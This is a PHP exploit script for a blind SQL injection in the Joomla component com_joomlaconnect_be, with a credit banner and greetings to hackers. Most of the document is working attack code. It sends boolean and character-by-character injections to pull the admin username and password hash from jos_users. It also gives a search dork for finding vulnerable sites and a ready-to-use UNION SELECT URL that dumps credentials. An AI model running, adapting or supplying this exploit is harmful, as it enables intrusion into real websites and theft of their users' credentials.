#!/usr/bin/php <?php ini_set("max_execution_time",0); print_r(' ########################################################################### [&#187;] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability ########################################################################### [&#187;] Script: [Joomla] [&#187;] Language: [ PHP ] [&#187;] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] [&#187;] Greetz to:[ Spcial >>>>His0k4 >>>> Tous les hackers Algrie [&#187;] Dork: inurl:index.php?option=com_joomlaconnect_be ########################################################################### ########################################################################### # # Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit # [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3 # # ########################################################################### '); if ($argc > 1) { $url = $argv[1]; $r = strlen(file_get_contents($url."+and+1=1--")); echo "nExploiting:n"; $w = strlen(file_get_contents($url."+and+1=0--")); $t = abs((100-($w/$r*100))); echo "Username: "; for ($i=1; $i <= 30; $i++) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); if (abs((100-($laenge/$r*100))) > $t-1) { $count = $i; $i = 30; } } for ($j = 1; $j < $count; $j++) { for ($i = 46; $i <= 122; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 122; } } } echo "nPassword: "; for ($j = 1; $j <= 49; $j++) { for ($i = 46; $i <= 102; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 102; } } } } ?> ########################################################################### [&#187;] Joomla com_joomlaconnect_be Remote Injection Vulnerability ########################################################################### [&#187;] Script: [Joomla] [&#187;] Language: [ PHP ] [&#187;] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] [&#187;] Greetz to:[ Spcial >>>> His0k4 >>>> Tous les hackers Algrie [&#187;] Dork: inurl:index.php?option=com_joomlaconnect_be ########################################################################### Exploit: http://www.Site.com/path/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=-3+UNION%20SELECT%201,2,3,4,5,6,7,8,9,concat%28username,0x3a,password%29,11,12,13,14,15,16,17,18,19,20,21,22+from+jos_users--